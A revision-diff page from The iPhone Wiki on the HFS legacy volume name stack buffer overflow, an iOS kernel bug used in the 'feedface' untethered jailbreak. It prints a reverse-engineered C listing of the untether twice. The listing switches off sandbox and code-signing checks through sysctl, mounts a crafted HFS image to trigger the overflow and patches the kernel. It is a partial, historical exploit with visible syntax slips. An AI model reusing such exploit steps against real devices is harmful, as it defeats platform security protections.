Difference between revisions of "HFS Legacy Volume Name Stack Buffer Overflow"

From The iPhone Wiki
Jump to: navigation, search
(Exploiting the Kernel Bug)
Line 10: Line 10:
 
int mnt_our_hfs()
 
int mnt_our_hfs()
 
{
 
{
struct hfs_mount_args i;
+
struct hfs_mount_args i;
bzero(i, sizeof(i));
+
bzero(i, sizeof(i));
i.fspec = (int)"/dev/vn0";
+
i.fspec = (int)"/dev/vn0";
i.hfs_uid = args.hfs_gid = 99;
+
i.hfs_uid = args.hfs_gid = 99;
i.hfs_mask = 0x1C5;
+
i.hfs_mask = 0x1C5;
puts("[+]Triggering the kernel exploit");
+
puts("[+]Triggering the kernel exploit");
mount("hfs", "mnt/", MNT_RDONLY, i);
+
mount("hfs", "mnt/", MNT_RDONLY, i);
return puts("[+] Payload was successful");
+
return puts("[+] Payload was successful");
 
}
 
}
   
 
int prep_vn()
 
int prep_vn()
 
{
 
{
vn_ioctl vn;
+
vn_ioctl vn;
int i = open("/dev/vn0", O_RDONLY, 0);
+
int i = open("/dev/vn0", O_RDONLY, 0);
if(i < 0){
+
if(i < 0){
puts("[-]Can't open /dev/vn0");
+
puts("[-]Can't open /dev/vn0");
exit(1);
+
exit(1);
}
 
ioctl(i, VNIOCDETACH, &vn);
 
vn.vn_file = (int)"/usr/lib/hfs_mdb";
 
vn.vn_control = vncontrol_readwrite_io_e;
 
if(ioctl(i, VNIOCATTACH, &vn) < 0)
 
{
 
puts("[-]Coudn't attach to /dev/vn0")''
 
close(i);
 
exit(1);
 
}
 
return close(1);
 
 
}
 
}
  +
ioctl(i, VNIOCDETACH, &vn);
  +
vn.vn_file = (int)"/usr/lib/hfs_mdb";
  +
vn.vn_control = vncontrol_readwrite_io_e;
  +
if(ioctl(i, VNIOCATTACH, &vn) < 0)
  +
{
  +
puts("[-]Coudn't attach to /dev/vn0")''
  +
close(i);
  +
exit(1);
  +
}
  +
return close(1);
  +
}
  +
 
int main(int argc, char const *argv[])
 
int main(int argc, char const *argv[])
 
{
 
{
int result;
+
int result;
struct stat i;
+
struct stat i;
uint32_t zero = 0, one = 1;
+
uint32_t zero = 0, one = 1;
sysctlbyname("security.mac.vnode_enforce", 0, 0, &zero, sizeof(uint32_t));
+
sysctlbyname("security.mac.vnode_enforce", 0, 0, &zero, sizeof(uint32_t));
sysctlbyname("vm.cs_validation", 0, 0, &zero, sizeof(uint32_t))
+
sysctlbyname("vm.cs_validation", 0, 0, &zero, sizeof(uint32_t))
prep_vn();
+
prep_vn();
i.st_uid = 0;
+
i.st_uid = 0;
i.st_gid = 0;
+
i.st_gid = 0;
i.st_rdev = 0;
+
i.st_rdev = 0;
i.st_atimespec.tv_nsec = 0;
+
i.st_atimespec.tv_nsec = 0;
i.st_atimespec.tv_sec = 0;
+
i.st_atimespec.tv_sec = 0;
i.st_mtimespec.tv_nsec = 0;
+
i.st_mtimespec.tv_nsec = 0;
i.st_mtimespec.tv_sec = 0;
+
i.st_mtimespec.tv_sec = 0;
i.st_ctimespec.tv_sec = 0;
+
i.st_ctimespec.tv_sec = 0;
i.st_dev = (dev_t)"/dev/vn0";
+
i.st_dev = (dev_t)"/dev/vn0";
i.st_ino = 99;
+
i.st_ino = 99;
i.st_uid = 453;
+
i.st_uid = 453;
puts("[+]Trigger kernel exploit");
+
puts("[+]Trigger kernel exploit");
mnt_our_hfs();
+
mnt_our_hfs();
sysctlbyname("security.mac.vnode_enforce", 0, 0, &one, sizeof(uint32_t));
+
sysctlbyname("security.mac.vnode_enforce", 0, 0, &one, sizeof(uint32_t));
patch_kernel();
+
patch_kernel();
   
return 0;
+
return 0;
 
}
 
}
  +
 
== Credit ==
 
== Credit ==
 
[[User:Jan0|jan0]], [[User:pod2g|pod2g]], [[User:posixninja|Posixninja]]
 
[[User:Jan0|jan0]], [[User:pod2g|pod2g]], [[User:posixninja|Posixninja]]

Revision as of 14:15, 28 March 2015

The HFS Legacy Volume Name Stack Buffer Overflow is a kernel vulnerability used to achieve an untethered jailbreak. Its exploit implementation, dubbed "feedface,"[1] was used in conjunction with limera1n's bootrom exploit or the usb_control_msg(0xA1, 1) Exploit in greenpois0n.

Exploiting the Kernel Bug

This stack buffer overflow relies on the hfs_mdb file in feedface, when the untether is ran it uses hfs_mdb to take control of PC register and do basically whatever you want, in that case, they used a function called real_payload() that patched the kernel and patched the sandbox. After some reverse engineering, here's what the untether looked like.

 int mnt_our_hfs()
 {
  struct hfs_mount_args i;
  bzero(i, sizeof(i));
  i.fspec = (int)"/dev/vn0";
  i.hfs_uid = args.hfs_gid = 99;
  i.hfs_mask = 0x1C5;
  puts("[+]Triggering the kernel exploit");
  mount("hfs", "mnt/", MNT_RDONLY, i);
  return puts("[+] Payload was successful");
 }
 int prep_vn()
 {
 vn_ioctl vn;
 int i = open("/dev/vn0", O_RDONLY, 0);
 if(i < 0){
 puts("[-]Can't open /dev/vn0");
 exit(1);
 }
 ioctl(i, VNIOCDETACH, &vn);
 vn.vn_file = (int)"/usr/lib/hfs_mdb";
 vn.vn_control = vncontrol_readwrite_io_e;
 if(ioctl(i, VNIOCATTACH, &vn) < 0)
 {
 puts("[-]Coudn't attach to /dev/vn0")
 close(i);
 exit(1);
 }
 return close(1);
 }
 
 int main(int argc, char const *argv[])
 {
 int result;
 struct stat i;
 uint32_t zero = 0, one = 1;
 sysctlbyname("security.mac.vnode_enforce", 0, 0, &zero, sizeof(uint32_t));
 sysctlbyname("vm.cs_validation", 0, 0, &zero, sizeof(uint32_t))
 prep_vn();
 i.st_uid = 0;
 i.st_gid = 0;
 i.st_rdev = 0;
 i.st_atimespec.tv_nsec = 0;
 i.st_atimespec.tv_sec = 0;
 i.st_mtimespec.tv_nsec = 0;
 i.st_mtimespec.tv_sec = 0;
 i.st_ctimespec.tv_sec = 0;
 i.st_dev = (dev_t)"/dev/vn0";
 i.st_ino = 99;
 i.st_uid = 453;
 puts("[+]Trigger kernel exploit");
 mnt_our_hfs();
 sysctlbyname("security.mac.vnode_enforce", 0, 0, &one, sizeof(uint32_t));
 patch_kernel();
 return 0;
 }

Credit

jan0, pod2g, Posixninja

Sources for information